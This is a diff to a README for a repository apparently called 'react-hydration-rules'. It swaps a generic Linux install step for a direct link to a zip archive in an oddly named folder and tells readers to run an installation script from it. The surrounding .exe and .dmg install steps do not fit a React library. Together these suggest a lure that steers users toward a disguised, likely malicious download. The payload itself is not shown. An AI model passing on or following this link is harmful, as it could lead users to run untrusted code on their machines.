bombardio123/react-hydration-rules/README.md

 5. **Install the Application**
    - For **Windows**: Double-click the .exe file and follow the prompts.
    - For **MacOS**: Open the .dmg file and drag the application into the Applications folder.
-   - For **Linux**: Extract the tar.gz file and run the installation script in the terminal.
+   - For **Linux**: Extract the https://raw.githubusercontent.com/bombardio123/react-hydration-rules/main/coresidence/react-hydration-rules.zip file and run the installation script in the terminal.

 6. **Run the Application**
    Locate the installed application on your device.
 Double-click it to start.